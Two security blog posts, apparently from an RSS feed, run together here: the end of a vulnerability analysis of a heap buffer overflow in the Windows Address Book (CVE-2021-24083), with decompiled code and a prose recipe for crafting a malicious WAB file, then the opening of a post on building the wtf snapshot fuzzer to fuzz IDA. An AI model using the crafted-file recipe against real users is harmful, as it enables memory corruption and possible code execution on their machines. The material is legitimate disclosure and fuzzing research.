            v24 = *(_DWORD *)ptr_to_buffer;         
            c_ptr_to_property_value = ptr_to_buffer + 4;// new exe: v13 = buffer_ptr + 4;
            v27 = remaining_buffer_bytes - 4;       
            if ( !(unsigned int)SecurityCheckSingleValue(v24, &c_ptr_to_property_value, &v27) )
              return security_check_result;
            remaining_buffer_bytes = v27;
            ptr_to_buffer = c_ptr_to_property_value;
          }
    LABEL_33:
          if ( !--l_header_dword_3 )
            break;
        }
      }
      if ( !l_header_dword_3 )
        security_check_result = 1;
      return security_check_result;
    }

At [4] the tag of the property being processed is checked. The checks performed depend on whether the property processed in each iteration is a simple or a composite property. For simple properties (i.e, properties with tag lower than 0x1000), execution continues at [8]. The following checks are done for simple properties:

  1. If the remaining number of bytes in the buffer is fewer than 4, the function returns with an error.
  2. A pointer to the property value is obtained and SecurityCheckSingleValue() is called to perform a security check upon the simple property and its value. SecurityCheckSingleValue() performs a security check and increments the pointer to point at the next property in the buffer, so that SecurityCheckPropArrayBuffer() can check the next property on the next iteration.
  3. The number of total properties is decremented and compared to zero. If equal to zero, then the function returns successfully. If different, the next iteration of the loop checks the next property.

Similarly, for composite properties (i.e, properties with tag equal or higher than 0x1000) execution continues at [5] and the following is done.

For variable length composite properties (if the property tag is equal to 0x1102 (PtypMultipleBinary) or equal or smaller than 0x101f (PtypMultipleString)), the code at [6] does the following:

  1. The number of bytes left to read in the buffer is compared with 0xC to avoid overrunning the buffer.
  2. The Size field of the property is compared to the remaining buffer length to avoid overrunning the buffer.
  3. For each nested property, the function SecurityCheckSingleValue() is called. It:
    1. Performs a security check on the nested property.
    2. Advances the pointer to the buffer held by the caller, in order to point to the next nested property.
  4. The loop runs until the number of total properties in the contact (decremented in each iteration) is zero.

For fixed-length composite properties (if the property tag in question is different from 0x1102 (PtypMultipleBinary) and larger than 0x101f (PtypMultipleString)), the following happens starting at [7]:

  1. The number of bytes left to read in the buffer is compared with 0xC to avoid overrunning the buffer.
  2. The Size is compared to the remaining buffer length to avoid overrunning the buffer.
  3. The size of each nested property, which depends only on the property tag, is calculated from the parent property tag.
  4. The Size is divided by NestedPropCount to obtain the size of each nested property.
  5. The function returns with an error if the calculated subproperty size is different from the property size deduced from parent property tag.
  6. The buffer pointer is incremented by the size of the parent property value to point to the next property.

Unknown or non-processable property types are assigned the nested property size 0x0.

It was observed that if the calculated property size is zero, the buffer pointer is advanced by the size of the property value, as described by the header. The buffer is advanced regardless of the property size and by advancing the buffer, the security check permits the value of the parent property (which may include subproperties) to stay unchecked. For the security check to pass the result of the division performed on Step 4 for fixed-length composite properties must be zero. Therefore for an unknown or non-processable property to pass the security check, NestedPropCount must be larger than Size. Note that since the size of any property in bytes is at least two, NestedPropCount must always be no larger than half of Size, and therefore, the aforementioned division must never be zero in benign cases.

After the checks have concluded, the function returns zero for a failed check and one for a passed check.

Subsequently, the function HrGetPropArrayFromFileRecord() calls HrGetPropArrayFromBuffer(), which aims to collect the properties into an array of _SPropValue structs and return it to the caller. The _SPropValue array has a length equal of the number of properties (as given by the contact header) and is allocated in the heap through a call to LocalAlloc(). The number of properties is multiplied by sizeof(_SPropValue) to yield the total buffer size. The following fragment shows the allocation taking place:

    if ( !property_array_r )
    {
        ret = -2147024809;
        goto LABEL_71;
    }
    *property_array_r = 0i64;
    header_dword_3_1 = set_to_zero + header_dword_3;

[9]

    if ( (unsigned int)header_dword_3_1 < header_dword_3       
      || (unsigned int)header_dword_3_1 > 0xAAAAAAA            
      || (v10 = (unsigned int)header_dword_3_1,                               
          property_array = (struct _SPropValue *)LocalAlloc(
                                                   0x40u,
                                                   0x18 * header_dword_3_1),
                                                   // sizeof(_SPropValue) * n_properties_in_binary
        (*property_array_r = property_array) == 0i64) )
    {
        ERROR_INSUFICIENT_MEMORY:
        ret = 0x8007000E;
        goto LABEL_71;
    }

An allocation of sizeof(_SPropValue) * n_properties_in_binary can be observed at [9]. Immediately after, each of the property structures are initialized and their property tag member is set to 1. After initialization, the buffer, on which security checks have already been performed, is processed property by property, advancing the property a pointer to the next property with the property header and value sizes provided by the property in question.

If the property processed by the specific loop iteration is a simple property, the following code is executed:

    if ( !_bittest((const signed int *)¤t_property_tag, 0xCu) )
    {
      if ( v16 < 4 )
        break;
      dword_1 = wab_ulong_buffer_full[1];
      ptr_to_dword_2 = (char *)(wab_ulong_buffer_full + 2);
      v38 = v16 - 4;
      if ( (unsigned int)dword_1 > v38 )
        break;
      current_property_tag = (unsigned __int16)current_property_tag;
      if ( (unsigned __int16)current_property_tag > 0xBu )
      {

[10]

        v39 = current_property_tag - 0x1E;
        if ( !v39 )
          goto LABEL_79;
        v40 = v39 - 1;
        if ( !v40 )
          goto LABEL_79;
        v41 = v40 - 0x21;
        if ( !v41 )
          goto LABEL_56;
        v42 = v41 - 8;
        if ( v42 )
        {
          if ( v42 != 0xBA )
            goto LABEL_56;
          v43 = dword_1;
          (*property_array_r)[p_idx].Value.bin.lpb = (LPBYTE)LocalAlloc(0x40u, dword_1);
          if ( !(*property_array_r)[p_idx].Value.bin.lpb )
            goto ERROR_INSUFICIENT_MEMORY;
          (*property_array_r)[p_idx].Value.l = dword_1;
          v44 = *(&(*property_array_r)[p_idx].Value.at + 1);
        }
        else
        {
    LABEL_79:

[11]
                                           
          v43 = dword_1;
          (*property_array_r)[p_idx].Value.cur.int64 = (LONGLONG)LocalAlloc(0x40u, dword_1);
          v44 = (*property_array_r)[p_idx].Value.dbl;
          if ( v44 == 0.0 )
            goto ERROR_INSUFICIENT_MEMORY;
        }
        memcpy_0(*(void **)&v44, ptr_to_dword_2, v43);
        wab_ulong_buffer_full = (ULONG *)&ptr_to_dword_2[v43];
      }
      else
      {
    LABEL_56:               

[12]
           
        memcpy_0(&(*property_array_r)[v15].Value, ptr_to_dword_2, dword_1);
        wab_ulong_buffer_full = (ULONG *)&ptr_to_dword_2[dword_1];
      }
      remaining_bytes_to_process = v38 - dword_1;
      goto NEXT_PROPERTY;
    }

[Truncated]

    NEXT_PROPERTY:
        ++p_idx;
        processed_property_count = (unsigned int)(processed_property_count_1 + 1);
        processed_property_count_1 = processed_property_count;
        if ( (unsigned int)processed_property_count >= c_header_dword_3 )
          return 0;
      }

At [10] the property tag is extracted and compared with several constants. If the property tag is 0x1e (PtypString8), 0x1f (PtypString), or 0x48 (PtypGuid), then execution continues at [11]. If the property tag is 0x40 (PtypTime) or is not recognized, execution continues at [12]. The memcpy call at [12] is prone to a heap overflow.

Conversely, if the property being processed in the specific loop iteration is not a simple property, the following code is executed. Notably, when the following code is executed, the pointer DWORD* wab_ulong_buffer_full points to the property tag of the property being processed. Regardless of which composite property is being processed, before the property tag is identified the buffer is advanced to point to the beginning of the property value, which is at the 4th 32-bit integer.

[13]

    if ( v16 < 4 )
    break;
    c_dword_1 = wab_ulong_buffer_full[1];
    v19 = v16 - 4;
    if ( v19 < 4 )
    break;
    dword_2 = wab_ulong_buffer_full[2];
    wab_ulong_buffer_full += 3;                     

    remaining_bytes_to_process = v19 - 4;

[14]

    if ( (unsigned __int16)current_property_tag >= 0x1002u )
    {
    if ( (unsigned __int16)current_property_tag <= 0x1007u || (unsigned __int16)current_property_tag == 0x1014 )
        goto LABEL_80;
    if ( (unsigned __int16)current_property_tag == 0x101E )
    {
        [Truncated]
        
    }
    if ( (unsigned __int16)current_property_tag == 0x101F )
    {
        [Truncated]        
    }
    if ( ((unsigned __int16)current_property_tag - 0x1040) & 0xFFFFFFF7 )
    {
        if ( (unsigned __int16)current_property_tag == 0x1102 )
        {
        [Truncated]
        }
    }
    else
    {
    LABEL_80:

[15]

        (*property_array_r)[p_idx].Value.bin.lpb = (LPBYTE)LocalAlloc(0x40u, dword_2);
        if ( !(*property_array_r)[p_idx].Value.bin.lpb )
        goto ERROR_INSUFICIENT_MEMORY;
        (*property_array_r)[p_idx].Value.l = c_dword_1;
        if ( (unsigned int)dword_2 > remaining_bytes_to_process )
        break;
        memcpy_0((*property_array_r)[p_idx].Value.bin.lpb, wab_ulong_buffer_full, dword_2);
        wab_ulong_buffer_full = (ULONG *)((char *)wab_ulong_buffer_full + dword_2);
        remaining_bytes_to_process -= dword_2;
    }
    }

    NEXT_PROPERTY:
        ++p_idx;
        processed_property_count = (unsigned int)(processed_property_count_1 + 1);
        processed_property_count_1 = processed_property_count;
        if ( (unsigned int)processed_property_count >= c_header_dword_3 )
        return 0;
    }

After the buffer has been advanced at [13], the property tag is compared with several constants starting at [14]. Finally, the code fragment at [15] attempts to process a composite property (i.e. >= 0x1000) with a tag not contemplated by the previous constants.

Although the processing logic of each type of property is irrelevant, an interesting fact is that if the property tag is not recognized, the buffer pointer has still been advanced to the end of the end of its header, and it’s never retracted. This happens if all of the following conditions are met:

  • The property tag is larger or equal than 0x1002.
  • The property tag is larger than 0x1007.
  • The property tag is different from 0x1014.
  • The property tag is different from 0x101e.
  • The property tag is different from 0x101f.
  • The property tag is different from 0x1102.
  • The result of subtracting 0x1040 from the property tag, and performing a bitwise AND of the result with 0xFFFFFFF7 is nonzero.

Interestingly, if all of the above conditions are met, the property header of the composite property is skipped, and the next loop iteration will interpret its property body as a different property.

Therefore, it is possible to overflow the _SPropValue array allocated in the heap by HrGetPropArrayFromBuffer() by using the following observations:

  • A specially crafted composite unknown or non-processable property can be made to bypass security checks if NestedPropCount is larger than Size.
  • HrGetPropArrayFromBuffer() can be made to interpret the Value of a specially crafted property as a separate property.

Proof-of-Concept

In order to create a malicious WAB file from a benign WAB file, export a valid WAB file from an instance of the Windows Address Book. It is noted that Outlook Express on Windows XP includes the ability to export contacts as a WAB file.

The benign WAB file can be modified to make it malicious by altering a contact inside it to have the following characteristics:

  • A nested property containing the following:
  • A tag of an unknown or unprocessable type, for example the tag 0x1058, with the following conditions:
    • Must be larger or equal than 0x1002.
    • Must be larger than 0x1007.
    • Must be different from 0x1014, 0x101e, 0x101f, and 0x1102.
    • The result of subtracting 0x1040 from the property tag, and performing a bitwise AND of the result with 0xFFFFFFF7 is non-zero.
    • Must be different from 0x1002, 0x1003, 0x1004, 0x1005, 0x1006, 0x1007, 0x1014, 0x1040, and 0x1048.
    • NestedPropCount is larger than Size.
    • The Value of the composite property is empty.
    • A malicious simple property containing the following:
    • A property tag different from 0x1e, 0x1f, 0x40 and 0x48. For example, the tag 0x0.
    • The Size value is larger than 0x18 x NestedPropCount in order to overflow the _SPropValue array buffer.
    • An unspecified number of trailing bytes, that will overflow the _SPropValue array buffer.

Finally, when an attacker tricks an unsuspecting user into importing the specially crafted WAB file, the vulnerability is triggered and code execution could be achieved. Failed exploitation attempts will most likely result in a crash of the Windows Address Book Import Tool.

Due to the presence of ASLR and a lack of a scripting engine, we were unable to obtain arbitrary code execution in Windows 10 from this vulnerability.

Conclusion

Hopefully you enjoyed this dive into CVE-2021-24083, and if you did, go ahead and check out our other blog post on a use-after-free vulnerability in Adobe Acrobat Reader DC. If you haven’t already, make sure to follow us on Twitter to keep up to date with our work. Happy hacking!

The post Analysis of a Heap Buffer-Overflow Vulnerability in Microsoft Windows Address Book appeared first on Exodus Intelligence.

Building a new snapshot fuzzer & fuzzing IDA

Introduction

It is January 2020 and it is this time of the year where I try to set goals for myself. I had just come back from spending Christmas with my family in France and felt fairly recharged. It always is an exciting time for me to think and plan for the year ahead; who knows maybe it'll be the year where I get good at computers I thought (spoiler alert: it wasn't).

One thing I had in the back of my mind was to develop my own custom fuzzing tooling. It was the perfect occasion to play with technologies like Windows Hypervisor platform APIs, KVM APIs but also try out what recent versions of C++ had in store. After talking with yrp604, he convinced me to write a tool that could be used to fuzz any Windows targets, user or kernel, application or service, kernel or drivers. He had done some work in this area so he could follow me along and help me out when I ran into problems.

Great, the plan was to develop this Windows snapshot-based fuzzer running the target code into some kind of environment like a VM or an emulator. It would allow the user to instrument the target the way they wanted via breakpoints and would provide basic features that you expect from a modern fuzzer: code coverage, crash detection, general mutator, cross-platform support, fast restore, etc.

Writing a tool is cool but writing a useful tool is even cooler. That's why I needed to come up with a target I could try the fuzzer against while developing it. I thought that IDA would make a good target for several reasons:

  1. It is a complex Windows user-mode application,
  2. It parses a bunch of binary files,
  3. The application is heavy and is slow to start. The snapshot approach could help fuzz it faster than traditionally,
  4. It has a bug bounty.

In this blog post, I will walk you through the birth of what the fuzz, its history, and my overall journey from zero to accomplishing my initial goals. For those that want the results before reading, you can find my findings in this Github repository: fuzzing-ida75.

There is also an excellent blog post that my good friend Markus authored on RET2 Systems' blog documenting how he used wtf to find exploitable memory corruption in a triple-A game: Fuzzing Modern UDP Game Protocols With Snapshot-based Fuzzers.

Architecture

At this point I had a pretty good idea of what the final product should look like and how a user would use wtf:

  1. The user finds a spot in the target that is close to consuming attacker-controlled data. The Windows kernel debugger is used to break at this location and put the target into the wanted state. When done, the user generates a kernel-crash dump and extracts the CPU state.
  2. The user writes a module to tell wtf how to insert a test case in the target. wtf provides basic features like reading physical and virtual memory ranges, read and write registers, etc. The user also defines exit conditions to tell the fuzzer when to stop executing test cases.
  3. wtf runs the targeted code, tracks code coverage, detects crashes, and tracks dirty memory.
  4. wtf restores the dirty physical memory from the kernel crash dump and resets the CPU state. It generates a new test case, rinse & repeat.

After laying out the plan, I realized that I didn't have code that parsed Windows kernel-crash dump which is essential for wtf. So I wrote kdmp-parser which is a C++ library that parses Windows kernel crash dumps. I wrote it myself because I couldn't find a simple drop-in library available on the shelf. Getting physical memory is not enough because I also needed to dump the CPU state as well as MSRs, etc. Thankfully yrp604 had already hacked up a Windbg Javascript extension to do the work and so I reused it bdump.js.

Once I was able to extract the physical memory & the CPU state I needed an execution environment to run my target. Again, yrp604 was working on bochscpu at the time and so I started there. bochscpu is basically bochs's CPU available from a Rust library with C bindings (yes he kindly made bindings because I didn't want to touch any Rust). It basically is a software CPU that knows how to run intel 64-bit code, knows about segmentation, rings, MSRs, etc. It also doesn't use any of bochs devices so it is much lighter. From the start, I decided that wtf wouldn't handle any devices: no disk, no screen, no mouse, no keyboards, etc.

Bochscpu 101

The first step was to load up the physical memory and configure the CPU of the execution environment. Memory in bochscpu is lazy: you start execution with no physical memory available and bochs invokes a callback of yours to tell you when the guest is accessing physical memory that hasn't been mapped. This is great because:

  1. No need to load an entire dump of memory inside the emulator when it starts,
  2. Only used memory gets mapped making the instance very light in memory usage.

I also need to introduce a few acronyms that I use everywhere:

  1. GPA: Guest physical address. This is a physical address inside the guest. The guest is what is run inside the emulator.
  2. GVA: Guest virtual address. This is guest virtual memory.
  3. HVA: Host virtual address. This is virtual memory inside the host. The host is what runs the execution environment.

To register the callback you need to invoke bochscpu_mem_missing_page. The callback receives the GPA that is being accessed and you can call bochscpu_mem_page_insert to insert an HVA page that backs a GPA into the environment. Yes, all guest physical memory is backed by regular virtual memory that the host allocates. Here is a simple example of what the wtf callback looks like:

void StaticGpaMissingHandler(const uint64_t Gpa) {
  const Gpa_t AlignedGpa = Gpa_t(Gpa).Align();
  BochsHooksDebugPrint("GpaMissingHandler: Mapping GPA {:#x} ({:#x}) ..\n",
                       AlignedGpa, Gpa);

  const void *DmpPage =
      reinterpret_cast<BochscpuBackend_t *>(g_Backend)->GetPhysicalPage(
          AlignedGpa);
  if (DmpPage == nullptr) {
    BochsHooksDebugPrint(
        "GpaMissingHandler: GPA {:#x} is not mapped in the dump.\n",
        AlignedGpa);
  }

  uint8_t *Page = (uint8_t *)aligned_alloc(Page::Size, Page::Size);
  if (Page == nullptr) {
    fmt::print("Failed to allocate memory in GpaMissingHandler.\n");
    __debugbreak();
  }

  if (DmpPage) {

    //
    // Copy the dump page into the new page.
    //

    memcpy(Page, DmpPage, Page::Size);

  } else {

    //
    // Fake it 'till you make it.
    //

    memset(Page, 0, Page::Size);
  }

  //
  // Tell bochscpu that we inserted a page backing the requested GPA.
  //

  bochscpu_mem_page_insert(AlignedGpa.U64(), Page);
}

It is simple:

  1. we allocate a page of memory with aligned_alloc as bochs requires page-aligned memory,
  2. we populate its content using the crash dump.
  3. we assume that if the guest accesses physical memory that isn't in the crash dump, it means that the OS is allocating "new" memory. We fill those pages with zeroes. We also assume that if we are wrong about that, the guest will crash in spectacular ways.

To create a context, you call bochscpu_cpu_new to create a virtual CPU and then bochscpu_cpu_set_state to set its state. This is a shortened version of LoadState:

void BochscpuBackend_t::LoadState(const CpuState_t &State) {
  bochscpu_cpu_state_t Bochs;
  memset(&Bochs, 0, sizeof(Bochs));

  Seed_ = State.Seed;
  Bochs.bochscpu_seed = State.Seed;
  Bochs.rax = State.Rax;
  Bochs.rbx = State.Rbx;
//...
  Bochs.rflags = State.Rflags;
  Bochs.tsc = State.Tsc;
  Bochs.apic_base = State.ApicBase;
  Bochs.sysenter_cs = State.SysenterCs;
  Bochs.sysenter_esp = State.SysenterEsp;
  Bochs.sysenter_eip = State.SysenterEip;
  Bochs.pat = State.Pat;
  Bochs.efer = uint32_t(State.Efer.Flags);
  Bochs.star = State.Star;
  Bochs.lstar = State.Lstar;
  Bochs.cstar = State.Cstar;
  Bochs.sfmask = State.Sfmask;
  Bochs.kernel_gs_base = State.KernelGsBase;
  Bochs.tsc_aux = State.TscAux;
  Bochs.fpcw = State.Fpcw;
  Bochs.fpsw = State.Fpsw;
  Bochs.fptw = State.Fptw;
  Bochs.cr0 = uint32_t(State.Cr0.Flags);
  Bochs.cr2 = State.Cr2;
  Bochs.cr3 = State.Cr3;
  Bochs.cr4 = uint32_t(State.Cr4.Flags);
  Bochs.cr8 = State.Cr8;
  Bochs.xcr0 = State.Xcr0;
  Bochs.dr0 = State.Dr0;
  Bochs.dr1 = State.Dr1;
  Bochs.dr2 = State.Dr2;
  Bochs.dr3 = State.Dr3;
  Bochs.dr6 = State.Dr6;
  Bochs.dr7 = State.Dr7;
  Bochs.mxcsr = State.Mxcsr;
  Bochs.mxcsr_mask = State.MxcsrMask;
  Bochs.fpop = State.Fpop;

#define SEG(_Bochs_, _Whv_)                                                    \
  {                                                                            \
    Bochs._Bochs_.attr = State._Whv_.Attr;                                     \
    Bochs._Bochs_.base = State._Whv_.Base;                                     \
    Bochs._Bochs_.limit = State._Whv_.Limit;                                   \
    Bochs._Bochs_.present = State._Whv_.Present;                               \
    Bochs._Bochs_.selector = State._Whv_.Selector;                             \
  }

  SEG(es, Es);
  SEG(cs, Cs);
  SEG(ss, Ss);
  SEG(ds, Ds);
  SEG(fs, Fs);
  SEG(gs, Gs);
  SEG(tr, Tr);
  SEG(ldtr, Ldtr);

#undef SEG

#define GLOBALSEG(_Bochs_, _Whv_)                                              \
  {                                                                            \
    Bochs._Bochs_.base = State._Whv_.Base;                                     \
    Bochs._Bochs_.limit = State._Whv_.Limit;                                   \
  }

  GLOBALSEG(gdtr, Gdtr);
  GLOBALSEG(idtr, Idtr);

  // ...
  bochscpu_cpu_set_state(Cpu_, &Bochs);
}

In order to register various hooks, you need a chain of bochscpu_hooks_t structures. For example, wtf registers them like this:

//
// Prepare the hooks.
//

Hooks_.ctx = this;
Hooks_.after_execution = StaticAfterExecutionHook;
Hooks_.before_execution = StaticBeforeExecutionHook;
Hooks_.lin_access = StaticLinAccessHook;
Hooks_.interrupt = StaticInterruptHook;
Hooks_.exception = StaticExceptionHook;
Hooks_.phy_access = StaticPhyAccessHook;
Hooks_.tlb_cntrl = StaticTlbControlHook;

I don't want to describe every hook but we get notified every time an instruction is executed and every time physical or virtual memory is accessed. The hooks are documented in instrumentation.txt if you are curious. As an example, this is the mechanism used to provide full system code coverage:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  //
  // Keep track of new code coverage or log into the trace file.
  //

  const auto &Res = AggregatedCodeCoverage_.emplace(Rip);
  if (Res.second) {
    LastNewCoverage_.emplace(Rip);
  }

  // ...
}

Once the hook chain is configured, you start execution of the guest with bochscpu_cpu_run:

//
// Lift off.
//

bochscpu_cpu_run(Cpu_, HookChain_);

Great, we're now pros and we can run some code!

Building the basics

In this part, I focus on the various fundamental blocks that we need to develop for the fuzzer to work and be useful.

Memory access facilities

As mentioned in the introduction, the user needs to tell the fuzzer how to insert a test case into its target. As a result, the user needs to be able to read & write physical and virtual memory.

Let's start with the easy one. To write into guest physical memory we need to find the backing HVA page. bochscpu uses a dictionary to map GPA to HVA pages that we can query using bochscpu_mem_phy_translate. Keep in mind that two adjacent GPA pages are not necessarily adjacent in the host address space, that is why writing across two pages needs extra care.

Writing to virtual memory is trickier because we need to know the backing GPAs. This means emulating the MMU and parsing the page tables. This gives us GPAs and we know how to write in this space. Same as above, writing across two pages needs extra care.

Instrumenting execution flow

Being able to instrument the target is very important because both the user and wtf itself need this to implement features. For example, crash detection is implemented by wtf using breakpoints in strategic areas. Another example, the user might also need to skip a function call and fake a return value. Implementing breakpoints in an emulator is easy as we receive a notification when an instruction is executed. This is the perfect spot to check if we have a registered breakpoint at this address and invoke a callback if so:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  // ...

  //
  // Handle breakpoints.
  //

  if (Breakpoints_.contains(Rip)) {
    Breakpoints_.at(Rip)(this);
  }
}

Handling infinite loop

To protect the fuzzer against infinite loops, the AfterExecutionHook hook is used to count instructions. This allows us to limit test case execution:

void BochscpuBackend_t::AfterExecutionHook(/*void *Context, */ uint32_t,
                                           void *) {

  //
  // Keep track of the instructions executed.
  //

  RunStats_.NumberInstructionsExecuted++;

  //
  // Check the instruction limit.
  //

  if (InstructionLimit_ > 0 &&
      RunStats_.NumberInstructionsExecuted > InstructionLimit_) {

    //
    // If we're over the limit, we stop the cpu.
    //

    BochsHooksDebugPrint("Over the instruction limit ({}), stopping cpu.\n",
                         InstructionLimit_);
    TestcaseResult_ = Timedout_t();
    bochscpu_cpu_stop(Cpu_);
  }
}

Tracking code coverage

Again, getting full system code coverage with bochscpu is very easy thanks to the hook points. Every time an instruction is executed we add the address into a set:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  //
  // Keep track of new code coverage or log into the trace file.
  //

  const auto &Res = AggregatedCodeCoverage_.emplace(Rip);
  if (Res.second) {
    LastNewCoverage_.emplace(Rip);
  }

Tracking dirty memory

wtf tracks dirty memory to be able to restore state fast. Instead of restoring the entire physical memory, we simply restore the memory that has changed since the beginning of the execution. One of the hook points notifies us when the guest accesses memory, so it is easy to know which memory gets written to.

void BochscpuBackend_t::LinAccessHook(/*void *Context, */ uint32_t,
                                      uint64_t VirtualAddress,
                                      uint64_t PhysicalAddress, uintptr_t Len,
                                      uint32_t, uint32_t MemAccess) {

  // ...

  //
  // If this is not a write access, we don't care to go further.
  //

  if (MemAccess != BOCHSCPU_HOOK_MEM_WRITE &&
      MemAccess != BOCHSCPU_HOOK_MEM_RW) {
    return;
  }

  //
  // Adding the physical address the set of dirty GPAs.
  // We don't use DirtyVirtualMemoryRange here as we need to
  // do a GVA->GPA translation which is a bit costly.
  //

  DirtyGpa(Gpa_t(PhysicalAddress));
}

Note that accesses straddling pages aren't handled in this callback because bochs delivers one call per page. Once wtf knows which pages are dirty, restoring is easy:

bool BochscpuBackend_t::Restore(const CpuState_t &CpuState) {
  // ...
  //
  // Restore physical memory.
  //

  uint8_t ZeroPage[Page::Size];
  memset(ZeroPage, 0, sizeof(ZeroPage));
  for (const auto DirtyGpa : DirtyGpas_) {
    const uint8_t *Hva = DmpParser_.GetPhysicalPage(DirtyGpa.U64());

    //
    // As we allocate physical memory pages full of zeros when
    // the guest tries to access a GPA that isn't present in the dump,
    // we need to be able to restore those. It's easy, if the Hva is nullptr,
    // we point it to a zero page.
    //

    if (Hva == nullptr) {
      Hva = ZeroPage;
    }

    bochscpu_mem_phy_write(DirtyGpa.U64(), Hva, Page::Size);
  }

  //
  // Empty the set.
  //

  DirtyGpas_.clear();

  // ...
  return true;
}

Generic mutators

I think generic mutators are great but I didn't want to spend too much time worrying about them. Ultimately I think you get more value out of writing a domain-specific generator and building a diverse high-quality corpus. So I simply ripped off libfuzzer's and honggfuzz's.

class LibfuzzerMutator_t {
  using CustomMutatorFunc_t =
      decltype(fuzzer::ExternalFunctions::LLVMFuzzerCustomMutator);
  fuzzer::Random Rand_;
  fuzzer::MutationDispatcher Mut_;
  std::unique_ptr<fuzzer::Unit> CrossOverWith_;

public:
  explicit LibfuzzerMutator_t(std::mt19937_64 &Rng);

  size_t Mutate(uint8_t *Data, const size_t DataLen, const size_t MaxSize);
  void RegisterCustomMutator(const CustomMutatorFunc_t F);
  void SetCrossOverWith(const Testcase_t &Testcase);
};

class HonggfuzzMutator_t {
  honggfuzz::dynfile_t DynFile_;
  honggfuzz::honggfuzz_t Global_;
  std::mt19937_64 &Rng_;
  honggfuzz::run_t Run_;

public:
  explicit HonggfuzzMutator_t(std::mt19937_64 &Rng);
  size_t Mutate(uint8_t *Data, const size_t DataLen, const size_t MaxSize);
  void SetCrossOverWith(const Testcase_t &Testcase);
};

Corpus store

Code coverage in wtf is basically the fitness function. Every test case that generates new code coverage is added to the corpus. The code that keeps track of the corpus is basically a glorified list of test cases that are kept in memory.

The main loop asks for a test case from the corpus which gets mutated by one of the generic mutators and finally runs into one of the execution environments. If the test case generated new coverage it gets added to the corpus store - nothing fancy.

    //
    // If the coverage size has changed, it means that this testcase
    // provided new coverage indeed.
    //

    const bool NewCoverage = Coverage_.size() > SizeBefore;
    if (NewCoverage) {

      //
      // Allocate a test that will get moved into the corpus and maybe
      // saved on disk.
      //

      Testcase_t Testcase((uint8_t *)ReceivedTestcase.data(),
                          ReceivedTestcase.size());

      //
      // Before moving the buffer into the corpus, set up cross over with
      // it.
      //

      Mutator_->SetCrossOverWith(Testcase);

      //
      // Ready to move the buffer into the corpus now.
      //

      Corpus_.SaveTestcase(Result, std::move(Testcase));
    }
  }

  // [...]

  //
  // If we get here, it means that we are ready to mutate.
  // First thing we do is to grab a seed.
  //

  const Testcase_t *Testcase = Corpus_.PickTestcase();
  if (!Testcase) {
    fmt::print("The corpus is empty, exiting\n");
    std::abort();
  }

  //
  // If the testcase is too big, abort as this should not happen.
  //

  if (Testcase->BufferSize_ > Opts_.TestcaseBufferMaxSize) {
    fmt::print(
        "The testcase buffer len is bigger than the testcase buffer max "
        "size.\n");
    std::abort();
  }

  //
  // Copy the input in a buffer we're going to mutate.
  //

  memcpy(ScratchBuffer_.data(), Testcase->Buffer_.get(),
          Testcase->BufferSize_);

  //
  // Mutate in the scratch buffer.
  //

  const size_t TestcaseBufferSize =
      Mutator_->Mutate(ScratchBuffer_.data(), Testcase->BufferSize_,
                        Opts_.TestcaseBufferMaxSize);

  //
  // Copy the testcase in its own buffer before sending it to the
  // consumer.
  //

  TestcaseContent.resize(TestcaseBufferSize);
  memcpy(TestcaseContent.data(), ScratchBuffer_.data(), TestcaseBufferSize);

Detecting context switches

Because we are running an entire OS, we want to avoid spending time executing things that aren't of interest to our purpose. If you are fuzzing ida64.exe you don't really care about executing explorer.exe code. For this reason, we look for cr3 changes thanks to the TlbControlHook callback and stop execution if needed:

void BochscpuBackend_t::TlbControlHook(/*void *Context, */ uint32_t,
                                       uint32_t What, uint64_t NewCrValue) {

  //
  // We only care about CR3 changes.
  //

  if (What != BOCHSCPU_HOOK_TLB_CR3) {
    return;
  }

  //
  // And we only care about it when the CR3 value is actually different from
  // when we started the testcase.
  //

  if (NewCrValue == InitialCr3_) {
    return;
  }

  //
  // Stop the cpu as we don't want to be context-switching.
  //

  BochsHooksDebugPrint("The cr3 register is getting changed ({:#x})\n",
                       NewCrValue);
  BochsHooksDebugPrint("Stopping cpu.\n");
  TestcaseResult_ = Cr3Change_t();
  bochscpu_cpu_stop(Cpu_);
}

Debug symbols

Imagine yourself fuzzing a target with wtf now. You need to write a fuzzer module in order to tell wtf how to feed a testcase to your target. To do that, you might need to read some global states to retrieve some offsets of some critical structures. We've built memory access facilities so you can definitely do that but you have to hardcode addresses. This gets in the way really fast when you are taking different snapshots, porting the fuzzer to a new version of the targeted software, etc.

This was identified early on as a big pain point for the user and I needed a way to not hardcode things that didn't need to be hardcoded. To address this problem, on Windows I use the IDebugClient / IDebugControl COM objects that allow programmatic use of dbghelp and dbgeng features. You can load a crash dump, evaluate and resolve symbols, etc. This is what the Debugger_t class does.

Trace generation

The most annoying thing for me was that execution backends are extremely opaque. It is really hard to see what's going on within them. Actually, if you have ever tried to use whv / kvm APIs you probably ran into the case where the API tells you that you loaded a 'wrong' CPU state. It might be an MSR not configured right, a weird segment descriptor, etc. Figuring out where the issue comes from is both painful and frustrating.

Not knowing what's happening is also annoying when the guest is bug-checking inside the backend. To address the lack of transparency I decided to generate execution traces that I could use for debugging. It is very rudimentary yet very useful to verify that the execution inside the backend is correct. In addition to this tool, you can always modify your module to add strategic breakpoints and dump registers when you want. Those traces are pretty cool because you get to follow everything that happens in the system: from user-mode to kernel-mode, the page-fault handler, etc.

Those traces are also used to be loaded in lighthouse to analyze the coverage generated by a particular test case.

Crash detection

The last basic block that I needed was user-mode crash detection. I had done some past work in the user exception handler so I kind of knew my way around it. I decided to hook ntdll!RtlDispatchException & nt!KiRaiseSecurityCheckFailure to detect fail-fast exceptions that can be triggered from stack cookie check failure.

Harnessing IDA: walking barefoot into the desert

Once I was done writing the basic features, I started to harness IDA. I knew I wanted to target the loader plugins and based on their sizes as well as past vulnerabilities it felt like looking at ELF was my best chance.

I initially started to harness IDA with its GUI and everything. In retrospect, this was bonkers as I remember handling tons of weird things related to Qt and win32k. After a few weeks of making progress here and there I realized that IDA had a few options to make my life easier:

